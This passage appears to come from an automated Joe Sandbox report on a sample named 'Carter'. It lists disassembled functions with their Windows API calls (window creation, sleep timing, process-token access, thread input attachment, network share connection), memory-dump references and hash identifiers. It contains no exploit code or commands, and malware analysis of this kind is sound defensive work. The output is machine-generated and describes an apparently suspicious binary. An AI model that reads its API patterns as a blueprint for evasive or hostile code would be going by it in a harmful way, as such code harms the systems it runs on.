                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 33ea288e21d16e802a5f25c605a324bc97753dd429de4994668fe17080471c8d
                                                                        • Instruction ID: 823d06442fd8dd16ad549d7b84fefd170e1cafc4da2b341e16c0561cfa0e93c4
                                                                        • Opcode Fuzzy Hash: 33ea288e21d16e802a5f25c605a324bc97753dd429de4994668fe17080471c8d
                                                                        • Instruction Fuzzy Hash: A8115A39900218FFEB11DF99C984EEDBBB8FB48710F204091EA00B7294D6716E11DB90
                                                                        Function 00FE2111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FE214F
                                                                        • GetStockObject.GDI32(00000011), ref: 00FE2163
                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FE216D
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMessageObjectSendStockWindow
                                                                        • String ID:
                                                                        • API String ID: 3970641297-0
                                                                        • Opcode ID: 08ca118d036b608ea4576bf2bfeb8ba063e4c26fa4901c50855ea0bbab7c3a97
                                                                        • Instruction ID: 00785f1d9d32d9be47f7c231b830be1ca14c7dca773a103cda6893018e7b43dd
                                                                        • Opcode Fuzzy Hash: 08ca118d036b608ea4576bf2bfeb8ba063e4c26fa4901c50855ea0bbab7c3a97
                                                                        • Instruction Fuzzy Hash: 64118B7290268DBFDB524F919C40EEABB6DFF5A764F040211FA0452008E73A9D60EBA0
                                                                        Function 01041941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,010404EC,?,0104153F,?,00008000), ref: 0104195E
                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,010404EC,?,0104153F,?,00008000), ref: 01041983
                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,010404EC,?,0104153F,?,00008000), ref: 0104198D
                                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,010404EC,?,0104153F,?,00008000), ref: 010419C0
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CounterPerformanceQuerySleep
                                                                        • String ID:
                                                                        • API String ID: 2875609808-0
                                                                        • Opcode ID: 0dbf1b8961c4f55951fdb1ef27ffcd14fb6fc02fe813393cff3c1ffc018904d3
                                                                        • Instruction ID: c80562b4f4c818755ad472b1d281ac1116595103b325e501775ccb473c5460bc
                                                                        • Opcode Fuzzy Hash: 0dbf1b8961c4f55951fdb1ef27ffcd14fb6fc02fe813393cff3c1ffc018904d3
                                                                        • Instruction Fuzzy Hash: E4117C75C0451DEBCF109FA4E588AEEBFB8FF09751F004165E9C0B2248DB35AA90CB91
                                                                        Function 0106E1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0106E1EA
                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0106E201
                                                                        • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0106E216
                                                                        • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0106E234
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                                        • String ID:
                                                                        • API String ID: 1352324309-0
                                                                        • Opcode ID: ccec65d67854cf877769608f41a365454aed9a7564877f447d1f5326d5450b62
                                                                        • Instruction ID: cdb79b88dad10b60fd636ff80a1444ff8590578f1f0e9b15a93b876dd43b057e
                                                                        • Opcode Fuzzy Hash: ccec65d67854cf877769608f41a365454aed9a7564877f447d1f5326d5450b62
                                                                        • Instruction Fuzzy Hash: 4B1161B9605306DFE330CF51DD08F97BBBDEB00B04F008659A696D6044E7B5E5149BA1
                                                                        Function 010171E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                        • String ID:
                                                                        • API String ID: 3016257755-0
                                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                        • Instruction ID: 674b585c373dc046d94756eec2169a3d0eb2c0da29151af4dbd4b39b5c08c045
                                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                        • Instruction Fuzzy Hash: 2F015A7208414EBBCF126E88CC41CEE3F62BB2D254F588555FE9859138D33AC5B2AB91
                                                                        Function 0106B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 0106B956
                                                                        • ScreenToClient.USER32(?,?), ref: 0106B96E
                                                                        • ScreenToClient.USER32(?,?), ref: 0106B992
                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0106B9AD
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                        • String ID:
                                                                        • API String ID: 357397906-0
                                                                        • Opcode ID: 6d1ef34493c4e533dd15a68b8238358508d2c0fdb3d6edce57dfefe07035b9b3
                                                                        • Instruction ID: 4705fbaa1471278db0d7bf25bc2e49b6a6f65805113525e860eb58ef50755af5
                                                                        • Opcode Fuzzy Hash: 6d1ef34493c4e533dd15a68b8238358508d2c0fdb3d6edce57dfefe07035b9b3
                                                                        • Instruction Fuzzy Hash: 371174B9D00209EFDB51DFA8D484AEEBBF9FF49210F104156E954E3214D735AA618F50
                                                                        Function 01047195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 010471A1
                                                                          • Part of subcall function 01047C7F: _memset.LIBCMT ref: 01047CB4
                                                                        • _memmove.LIBCMT ref: 010471C4
                                                                        • _memset.LIBCMT ref: 010471D1
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 010471E1
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                        • String ID:
                                                                        • API String ID: 48991266-0
                                                                        • Opcode ID: f2262ffe4f8ed17c1f8ab403da2a18d1bd54c8516426fd699861b50a53a1a1f4
                                                                        • Instruction ID: 78abbc639ef334eb3490757e6e4a5567a3a5989a2d08ac5f3fec4c921c300af1
                                                                        • Opcode Fuzzy Hash: f2262ffe4f8ed17c1f8ab403da2a18d1bd54c8516426fd699861b50a53a1a1f4
                                                                        • Instruction Fuzzy Hash: 6CF05E7A600104ABCF116F55ECC4A8ABB29EF55320F08C065FE48AE25AC736E811DBB4
                                                                        Function 0106C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FE1729
                                                                          • Part of subcall function 00FE16CF: SelectObject.GDI32(?,00000000), ref: 00FE1738
                                                                          • Part of subcall function 00FE16CF: BeginPath.GDI32(?), ref: 00FE174F
                                                                          • Part of subcall function 00FE16CF: SelectObject.GDI32(?,00000000), ref: 00FE1778
                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0106C3E8
                                                                        • LineTo.GDI32(00000000,?,?), ref: 0106C3F5
                                                                        • EndPath.GDI32(00000000), ref: 0106C405
                                                                        • StrokePath.GDI32(00000000), ref: 0106C413
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                        • String ID:
                                                                        • API String ID: 1539411459-0
                                                                        • Opcode ID: ba0c386112b87cfc5305bcdda43261e15611055679bf00bf77f45172b005d0ae
                                                                        • Instruction ID: 2ee5419fcc3da5f1cf48f09b300e4db57c82832528856014b5f4df1d86123003
                                                                        • Opcode Fuzzy Hash: ba0c386112b87cfc5305bcdda43261e15611055679bf00bf77f45172b005d0ae
                                                                        • Instruction Fuzzy Hash: 88F0BE32041259BAEB236F55AC09FDE3F99AF06320F088140FAD1710D9C7BA1190DBE9
                                                                        Function 0103AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0103AA6F
                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0103AA82
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0103AA89
                                                                        • AttachThreadInput.USER32(00000000), ref: 0103AA90
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                        • String ID:
                                                                        • API String ID: 2710830443-0
                                                                        • Opcode ID: 6c9e64cd2f974eceb7b565c730e62a5c3a4ac67dfe91d7091607a95000e8339a
                                                                        • Instruction ID: 8b99f97483bcd812eb873f7fd6da18ef7bc26b8a482639dcf1f2d8f326138f1e
                                                                        • Opcode Fuzzy Hash: 6c9e64cd2f974eceb7b565c730e62a5c3a4ac67dfe91d7091607a95000e8339a
                                                                        • Instruction Fuzzy Hash: A7E0E532A45228B6DB315EA1DD0DED77F5CEF567A1F008115F589D5044C7778541CBE0
                                                                        Function 00FE25F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSysColor.USER32(00000008), ref: 00FE260D
                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00FE2617
                                                                        • SetBkMode.GDI32(?,00000001), ref: 00FE262C
                                                                        • GetStockObject.GDI32(00000005), ref: 00FE2634
                                                                        • GetWindowDC.USER32(?,00000000), ref: 0101C1C4
                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0101C1D1
                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0101C1EA
                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0101C203
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0101C223
                                                                        • ReleaseDC.USER32(?,00000000), ref: 0101C22E
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                        • String ID:
                                                                        • API String ID: 1946975507-0
                                                                        • Opcode ID: 4d93d69fcde6d6e1f5bfe87b997c9c05f43fc58e00b406e3498bc93dda8f9e35
                                                                        • Instruction ID: fd333594b602735c6c4996f48ab0ec806f75feae256526239537ffcff1dcdf34
                                                                        • Opcode Fuzzy Hash: 4d93d69fcde6d6e1f5bfe87b997c9c05f43fc58e00b406e3498bc93dda8f9e35
                                                                        • Instruction Fuzzy Hash: 0CE06531944244BBEF715F68B8097D83B11FB06331F048366FAA9980DD87764580DB11
                                                                        Function 01039330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentThread.KERNEL32 ref: 01039339
                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,01038F04), ref: 01039340
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,01038F04), ref: 0103934D
                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,01038F04), ref: 01039354
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                        • String ID:
                                                                        • API String ID: 3974789173-0
                                                                        • Opcode ID: 34a5fb7bb0c2d4e48fb62c49943b8a5587abadfa4c52037f326331c01f59586c
                                                                        • Instruction ID: e3e35bbca18534687bff61648bcaa26a048dc915695732fd47d4ba7e6fda6515
                                                                        • Opcode Fuzzy Hash: 34a5fb7bb0c2d4e48fb62c49943b8a5587abadfa4c52037f326331c01f59586c
                                                                        • Instruction Fuzzy Hash: 45E08672A01211AFD7711FB55D0DB977BACEF427A5F108858B2C5E9088E7799045C760
                                                                        Function 01020679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDesktopWindow.USER32 ref: 01020679
                                                                        • GetDC.USER32(00000000), ref: 01020683
                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 010206A3
                                                                        • ReleaseDC.USER32(?), ref: 010206C4
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 2889604237-0
                                                                        • Opcode ID: cbd3a1119d628dd1b62e943b38a02b168a9692b798e263baa14a7adef7828e7b
                                                                        • Instruction ID: 4ef6d132597e73bdfa64355ca10ad0f579a5d13b79a477beae27c828c17eb97f
                                                                        • Opcode Fuzzy Hash: cbd3a1119d628dd1b62e943b38a02b168a9692b798e263baa14a7adef7828e7b
                                                                        • Instruction Fuzzy Hash: E9E01A71C00204EFCB219FA1D808A5D7BF5FB8C310F218109F89AE7208CB7D95419F50
                                                                        Function 0102068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDesktopWindow.USER32 ref: 0102068D
                                                                        • GetDC.USER32(00000000), ref: 01020697
                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 010206A3
                                                                        • ReleaseDC.USER32(?), ref: 010206C4
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 2889604237-0
                                                                        • Opcode ID: d0d76798f719577f3e7121a9ef612433967da2afc1e2b356b252ec0dbf48bc2d
                                                                        • Instruction ID: a9f872feed48cbf585fc2c7cb380a733285ac73daea020e8fa48419a4ae927d6
                                                                        • Opcode Fuzzy Hash: d0d76798f719577f3e7121a9ef612433967da2afc1e2b356b252ec0dbf48bc2d
                                                                        • Instruction Fuzzy Hash: 5FE01A71C00204AFCB219FA1D80865D7BF5BB8C310F208108F999E7208CB7D95419F50
                                                                        Function 0104B5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF436A: _wcscpy.LIBCMT ref: 00FF438D
                                                                          • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
                                                                          • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
                                                                        • __wcsnicmp.LIBCMT ref: 0104B670
                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0104B739
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                        • String ID: LPT
                                                                        • API String ID: 3222508074-1350329615
                                                                        • Opcode ID: 4ffcc5f823a61ad021117943940505868de945a0c1c2bea7c494c88ce3575119
                                                                        • Instruction ID: 68c9bbf972450835a585fa8882a291714bc7d9003a4fc7e14184ac21c25ebada
                                                                        • Opcode Fuzzy Hash: 4ffcc5f823a61ad021117943940505868de945a0c1c2bea7c494c88ce3575119
                                                                        • Instruction Fuzzy Hash: 25616FB5A00219AFDB15DF98C891EAEB7F4FF08710F0480A9F586AB291D774EE41CB50
                                                                        Function 00FEE00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000), ref: 00FEE01E
                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00FEE037
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalMemorySleepStatus
                                                                        • String ID: @
                                                                        • API String ID: 2783356886-2766056989
                                                                        • Opcode ID: 73764abfa01c747bb301da091fe7647a5303ec50cbf7514555754756ca5ab096
                                                                        • Instruction ID: aa21a8279a097c50d9f78b9716fe9a1dbc3c319a02d016dc00b68b2f65fa23dc
                                                                        • Opcode Fuzzy Hash: 73764abfa01c747bb301da091fe7647a5303ec50cbf7514555754756ca5ab096
                                                                        • Instruction Fuzzy Hash: 945159724087849BE320AF51EC86BAFBBF8FF84314F41484DF2D841195DB75A529DB16
                                                                        Function 01068096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 01068186
                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0106819B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
